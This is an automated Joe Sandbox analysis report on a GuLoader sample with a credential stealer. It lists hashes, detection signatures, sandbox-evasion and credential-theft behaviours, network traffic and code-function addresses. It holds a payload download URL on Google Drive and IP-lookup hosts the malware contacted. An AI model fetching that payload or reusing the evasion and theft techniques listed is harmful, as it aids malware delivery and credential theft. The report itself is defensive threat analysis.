Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
1258ad6Jpw.exe

Overview

General Information

Sample name:1258ad6Jpw.exe
renamed because original name is a hash value
Original sample name:d953e4ecdd89c5bec7fa20b1d7f43ad83940c3505b9deaaf8dd79247d4178852.exe
Analysis ID:1632353
MD5:8b0bd4c6a70334229181f7f0563e154b
SHA1:cb0adf2e607fd383b5f1f2e298b0aee721d5716f
SHA256:d953e4ecdd89c5bec7fa20b1d7f43ad83940c3505b9deaaf8dd79247d4178852
Tags:exeGuLoaderuser-adrian__luca
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for submitted file
Yara detected GuLoader
Disable Task Manager(disabletaskmgr)
Disables CMD prompt
Disables the Windows task manager (taskmgr)
Joe Sandbox ML detected suspicious sample
Switches to a custom stack to bypass stack traces
Tries to detect the country of the analysis system (by using the IP)
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for read data from the clipboard
Contains functionality to dynamically determine API calls
Contains functionality to shutdown / reboot the system
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Detected potential crypto function
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer

Classification

  • System is w10x64
  • 1258ad6Jpw.exe (PID: 6940 cmdline: "C:\Users\user\Desktop\1258ad6Jpw.exe" MD5: 8B0BD4C6A70334229181F7F0563E154B)
    • 1258ad6Jpw.exe (PID: 4664 cmdline: "C:\Users\user\Desktop\1258ad6Jpw.exe" MD5: 8B0BD4C6A70334229181F7F0563E154B)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
CloudEyE, GuLoaderCloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye
No configs have been found
SourceRuleDescriptionAuthorStrings
00000003.00000002.2134875649.0000000034B36000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
    00000000.00000002.1239205290.0000000003586000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
      Process Memory Space: 1258ad6Jpw.exe PID: 4664JoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        No Sigma rule has matched
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-07T22:44:13.116704+010028032742Potentially Bad Traffic192.168.2.849691158.101.44.24280TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2025-03-07T22:44:06.947274+010028032702Potentially Bad Traffic192.168.2.849689142.250.184.238443TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: 1258ad6Jpw.exeAvira: detected
        Source: 1258ad6Jpw.exeVirustotal: Detection: 72%Perma Link
        Source: 1258ad6Jpw.exeReversingLabs: Detection: 62%
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

        Location Tracking

        barindex
        Source: unknownDNS query: name: reallyfreegeoip.org
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37549FC8 CryptUnprotectData,3_2_37549FC8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3754A6FB CryptUnprotectData,3_2_3754A6FB
        Source: 1258ad6Jpw.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49692 version: TLS 1.0
        Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.8:49689 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.8:49690 version: TLS 1.2
        Source: 1258ad6Jpw.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_00405665 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,0_2_00405665
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_004060C7 FindFirstFileA,FindClose,0_2_004060C7
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_0040270B FindFirstFileA,0_2_0040270B
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_00405665 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,FindNextFileA,FindClose,3_2_00405665
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_0040270B FindFirstFileA,3_2_0040270B
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_004060C7 FindFirstFileA,FindClose,3_2_004060C7
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 03FFA3A1h3_2_03FFA0F0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 03FFA96Ah3_2_03FFA550
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 03FFA96Ah3_2_03FFA540
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 03FFA96Ah3_2_03FFA897
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 03FFF000h3_2_03FFED58
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 03FFF458h3_2_03FFF1B0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 03FFF8B0h3_2_03FFF608
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 03FFFD08h3_2_03FFFA60
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 3701630Dh3_2_37016130
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37016C97h3_2_37016130
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h3_2_3701563E
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 370149A0h3_2_370146F8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37013840h3_2_37013598
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 370118A0h3_2_370115F8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37010740h3_2_37010498
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 370125AAh3_2_37012300
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37014548h3_2_370142A0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 370133E8h3_2_37013140
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37011448h3_2_370111A0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 370102E8h3_2_37010040
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37015250h3_2_37014FA8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 370140F0h3_2_37013E48
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37012150h3_2_37011EA8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37010FF0h3_2_37010D48
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37012F90h3_2_37012CE8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37014DF8h3_2_37014B50
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37011CF8h3_2_37011A50
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37013C98h3_2_370139F0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37012B38h3_2_37012890
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then mov esp, ebp3_2_370198DB
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37010B98h3_2_370108F0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 3754969Dh3_2_37549360
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 375491B1h3_2_37548F08
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37548901h3_2_37548658
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 3754FD18h3_2_3754FA70
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 3754C0B8h3_2_3754BE10
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 375484A9h3_2_37548200
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37548D59h3_2_37548AB0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 3754B808h3_2_3754B560
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 3754B3B0h3_2_3754B108
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 3754BC60h3_2_3754B9B8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 37548051h3_2_37547DA8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 3754AB00h3_2_3754A858
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 4x nop then jmp 3754AF58h3_2_3754ACB0
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
        Source: Joe Sandbox ViewIP Address: 104.21.16.1 104.21.16.1
        Source: Joe Sandbox ViewIP Address: 158.101.44.242 158.101.44.242
        Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
        Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: unknownDNS query: name: checkip.dyndns.org
        Source: unknownDNS query: name: reallyfreegeoip.org
        Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.8:49691 -> 158.101.44.242:80
        Source: Network trafficSuricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.8:49689 -> 142.250.184.238:443
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1wr2BieghpXaBqyF8u9_6n0Pi4JbaxcfL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1wr2BieghpXaBqyF8u9_6n0Pi4JbaxcfL&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: unknownHTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.8:49692 version: TLS 1.0
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1wr2BieghpXaBqyF8u9_6n0Pi4JbaxcfL HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Host: drive.google.comCache-Control: no-cache
        Source: global trafficHTTP traffic detected: GET /download?id=1wr2BieghpXaBqyF8u9_6n0Pi4JbaxcfL&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:134.0) Gecko/20100101 Firefox/134.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET /xml/8.46.123.189 HTTP/1.1Host: reallyfreegeoip.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.orgConnection: Keep-Alive
        Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;)Host: checkip.dyndns.org
        Source: global trafficDNS traffic detected: DNS query: drive.google.com
        Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
        Source: global trafficDNS traffic detected: DNS query: checkip.dyndns.org
        Source: global trafficDNS traffic detected: DNS query: reallyfreegeoip.org
        Source: 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.com
        Source: 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.comd
        Source: 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A4A000.00000004.00000800.00020000.00000000.sdmp, 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org
        Source: 1258ad6Jpw.exe, 00000003.00000002.2134875649.00000000349E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/
        Source: 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.org/d
        Source: 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://checkip.dyndns.orgd
        Source: 1258ad6Jpw.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
        Source: 1258ad6Jpw.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
        Source: 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.org
        Source: 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A7C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://reallyfreegeoip.orgd
        Source: 1258ad6Jpw.exe, 00000003.00000002.2134875649.00000000349E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: 1258ad6Jpw.exe, 00000003.00000003.1394064569.00000000042E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://apis.google.com
        Source: 1258ad6Jpw.exe, 00000003.00000002.2115845591.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com
        Source: 1258ad6Jpw.exe, 00000003.00000002.2115845591.000000000429D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/
        Source: 1258ad6Jpw.exe, 00000003.00000002.2116123995.0000000005D30000.00000004.00001000.00020000.00000000.sdmp, 1258ad6Jpw.exe, 00000003.00000002.2115845591.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1wr2BieghpXaBqyF8u9_6n0Pi4JbaxcfL
        Source: 1258ad6Jpw.exe, 00000003.00000002.2115845591.00000000042B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.google.com/uc?export=download&id=1wr2BieghpXaBqyF8u9_6n0Pi4JbaxcfLr
        Source: 1258ad6Jpw.exe, 00000003.00000002.2115845591.00000000042DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
        Source: 1258ad6Jpw.exe, 00000003.00000003.1394064569.00000000042E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1wr2BieghpXaBqyF8u9_6n0Pi4JbaxcfL&export=download
        Source: 1258ad6Jpw.exe, 00000003.00000002.2115845591.00000000042CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1wr2BieghpXaBqyF8u9_6n0Pi4JbaxcfL&export=downloadN
        Source: 1258ad6Jpw.exe, 00000003.00000002.2115845591.00000000042CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=1wr2BieghpXaBqyF8u9_6n0Pi4JbaxcfL&export=downloadw
        Source: 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
        Source: 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
        Source: 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189d
        Source: 1258ad6Jpw.exe, 00000003.00000002.2134875649.0000000034A5F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189l
        Source: 1258ad6Jpw.exe, 00000003.00000003.1394064569.00000000042E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ssl.gstatic.com
        Source: 1258ad6Jpw.exe, 00000003.00000003.1394064569.00000000042E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google-analytics.com;report-uri
        Source: 1258ad6Jpw.exe, 00000003.00000003.1394064569.00000000042E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
        Source: 1258ad6Jpw.exe, 00000003.00000003.1394064569.00000000042E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.googletagmanager.com
        Source: 1258ad6Jpw.exe, 00000003.00000003.1394064569.00000000042E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49689
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49692
        Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
        Source: unknownNetwork traffic detected: HTTP traffic on port 49689 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
        Source: unknownHTTPS traffic detected: 142.250.184.238:443 -> 192.168.2.8:49689 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 142.250.185.97:443 -> 192.168.2.8:49690 version: TLS 1.2
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_0040511A GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040511A
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_004031A3 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004031A3
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_004031A3 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,3_2_004031A3
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeFile created: C:\Windows\resources\0809Jump to behavior
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_004049590_2_00404959
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 0_2_00406D360_2_00406D36
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_004049593_2_00404959
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_0040655F3_2_0040655F
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_00406D363_2_00406D36
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_03FFA0F03_2_03FFA0F0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_03FF27B93_2_03FF27B9
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_03FF2DD13_2_03FF2DD1
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_03FFD7883_2_03FFD788
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_03FFA0E13_2_03FFA0E1
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_03FFE4B83_2_03FFE4B8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_03FFE9813_2_03FFE981
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_03FFED583_2_03FFED58
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_03FFF1B03_2_03FFF1B0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_03FFF1A03_2_03FFF1A0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_03FFF6083_2_03FFF608
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_03FFF5F83_2_03FFF5F8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_03FFFA603_2_03FFFA60
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_03FFFA503_2_03FFFA50
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370177F03_2_370177F0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370195FC3_2_370195FC
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370184903_2_37018490
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370161303_2_37016130
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370171A83_2_370171A8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37017E403_2_37017E40
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370177E43_2_370177E4
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3701563E3_2_3701563E
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370146F23_2_370146F2
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370146F83_2_370146F8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3701358A3_2_3701358A
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370135983_2_37013598
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370115E83_2_370115E8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370115F83_2_370115F8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370104883_2_37010488
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3701848E3_2_3701848E
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370104983_2_37010498
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370123003_2_37012300
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370142903_2_37014290
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370142A03_2_370142A0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370122F23_2_370122F2
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370161223_2_37016122
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370131303_2_37013130
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370131403_2_37013140
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370111913_2_37011191
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370171973_2_37017197
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370111A03_2_370111A0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370100403_2_37010040
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37014F983_2_37014F98
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37014FA83_2_37014FA8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37017E373_2_37017E37
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37013E393_2_37013E39
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37013E483_2_37013E48
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37011E983_2_37011E98
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37011EA83_2_37011EA8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37010D393_2_37010D39
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37010D483_2_37010D48
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37012CDA3_2_37012CDA
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37012CE83_2_37012CE8
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37018B0E3_2_37018B0E
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37018B103_2_37018B10
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37014B413_2_37014B41
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37014B503_2_37014B50
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37011A403_2_37011A40
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_37011A503_2_37011A50
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370139E03_2_370139E0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370139F03_2_370139F0
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_3701287F3_2_3701287F
        Source: C:\Users\user\Desktop\1258ad6Jpw.exeCode function: 3_2_370128903_2_37012890
